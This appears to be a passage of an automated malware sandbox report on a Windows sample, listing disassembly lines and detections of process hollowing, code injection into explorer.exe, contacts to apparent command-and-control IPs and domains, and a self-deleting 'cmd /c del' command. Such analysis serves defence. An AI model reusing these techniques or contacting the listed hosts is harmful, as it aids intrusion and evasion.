          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AD30 mov eax, dword ptr fs:[00000030h]10_2_0343AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346513A mov eax, dword ptr fs:[00000030h]10_2_0346513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346513A mov eax, dword ptr fs:[00000030h]10_2_0346513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034BA537 mov eax, dword ptr fs:[00000030h]10_2_034BA537
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]10_2_03464D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]10_2_03464D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464D3B mov eax, dword ptr fs:[00000030h]10_2_03464D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]10_2_0343B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]10_2_0343B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B1E1 mov eax, dword ptr fs:[00000030h]10_2_0343B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034C41E8 mov eax, dword ptr fs:[00000030h]10_2_034C41E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h]10_2_0344D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0 mov eax, dword ptr fs:[00000030h]10_2_0344D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034E8DF1 mov eax, dword ptr fs:[00000030h]10_2_034E8DF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A185 mov eax, dword ptr fs:[00000030h]10_2_0346A185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C182 mov eax, dword ptr fs:[00000030h]10_2_0345C182
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]10_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]10_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]10_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581 mov eax, dword ptr fs:[00000030h]10_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]10_2_03432D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]10_2_03432D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]10_2_03432D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]10_2_03432D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03432D8A mov eax, dword ptr fs:[00000030h]10_2_03432D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462990 mov eax, dword ptr fs:[00000030h]10_2_03462990
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h]10_2_0346FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FD9B mov eax, dword ptr fs:[00000030h]10_2_0346FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h]10_2_034661A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034661A0 mov eax, dword ptr fs:[00000030h]10_2_034661A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034635A1 mov eax, dword ptr fs:[00000030h]10_2_034635A1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B69A6 mov eax, dword ptr fs:[00000030h]10_2_034B69A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]10_2_03461DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]10_2_03461DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]10_2_03461DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]10_2_034B51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]10_2_034B51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]10_2_034B51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]10_2_034B51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A44B mov eax, dword ptr fs:[00000030h]10_2_0346A44B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03450050 mov eax, dword ptr fs:[00000030h]10_2_03450050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03450050 mov eax, dword ptr fs:[00000030h]10_2_03450050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h]10_2_034CC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h]10_2_034CC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03501074 mov eax, dword ptr fs:[00000030h]10_2_03501074
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345746D mov eax, dword ptr fs:[00000030h]10_2_0345746D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F2073 mov eax, dword ptr fs:[00000030h]10_2_034F2073
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]10_2_034B6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]10_2_034B6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]10_2_034B6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]10_2_034B6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03504015 mov eax, dword ptr fs:[00000030h]10_2_03504015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03504015 mov eax, dword ptr fs:[00000030h]10_2_03504015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]10_2_034F1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]10_2_034B7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]10_2_034B7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]10_2_034B7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]10_2_0350740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]10_2_0350740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]10_2_0350740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346BC2C mov eax, dword ptr fs:[00000030h]10_2_0346BC2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]10_2_0346002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]10_2_0346002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]10_2_0346002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]10_2_0346002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]10_2_0346002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]10_2_0344B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]10_2_0344B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]10_2_0344B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]10_2_0344B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508CD6 mov eax, dword ptr fs:[00000030h]10_2_03508CD6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]10_2_034CB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov ecx, dword ptr fs:[00000030h]10_2_034CB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]10_2_034CB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]10_2_034CB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]10_2_034CB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]10_2_034CB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034358EC mov eax, dword ptr fs:[00000030h]10_2_034358EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F14FB mov eax, dword ptr fs:[00000030h]10_2_034F14FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]10_2_034B6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]10_2_034B6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]10_2_034B6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439080 mov eax, dword ptr fs:[00000030h]10_2_03439080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h]10_2_034B3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h]10_2_034B3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344849B mov eax, dword ptr fs:[00000030h]10_2_0344849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034790AF mov eax, dword ptr fs:[00000030h]10_2_034790AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov ecx, dword ptr fs:[00000030h]10_2_0346F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h]10_2_0346F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h]10_2_0346F0BF
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.21 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.34.228.66 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sh-zzjy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.248 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 46.137.146.55 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.143.9.211 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nirvananaturalcbd.net
          Source: C:\Windows\explorer.exeDomain query: www.boicity.com
          Source: C:\Windows\explorer.exeDomain query: www.zrcezzfdfkyjlir.com
          Source: C:\Windows\explorer.exeDomain query: www.iafzal.com
          Source: C:\Windows\explorer.exeDomain query: www.updates-app.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeMemory written: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: BB0000Jump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.731475226.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
